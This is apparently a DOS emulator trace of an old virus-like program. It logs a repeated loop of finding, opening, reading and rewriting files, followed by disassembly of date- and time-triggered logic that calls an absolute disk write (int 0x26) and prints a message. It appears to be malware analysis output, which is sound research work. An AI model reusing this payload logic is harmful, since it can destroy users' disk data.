2018-12-25T12:22:13.991019423Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:22:14.255794784Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:14.25889696Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:14.266941035Z 62 PC: 14190 | Close file
2018-12-25T12:22:14.275367478Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.27955447Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.286207801Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.292977003Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.310764294Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.313628534Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.325481775Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.331168389Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.337972831Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.346911974Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.350127621Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.356532481Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.362695731Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.364970857Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.367868983Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.375718687Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.378003169Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.384873356Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.392955687Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.395745708Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.403384254Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.40966223Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.411271336Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.415043826Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.432525431Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.434313891Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.441625045Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.449606243Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.452138097Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.459165476Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.465550974Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.467118398Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.473295401Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.481069349Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.48266544Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.489977103Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.498443499Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.501225914Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.508434671Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.515319Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.516967806Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.520199927Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.528707382Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.531038616Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.538063137Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.546399481Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.548995177Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.556130545Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.562710875Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.564524123Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.568406571Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.576402861Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.577788511Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.584575924Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.594968818Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.598329291Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.604746381Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.608120809Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.610231342Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.613023784Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:14.616033056Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:14.618109381Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2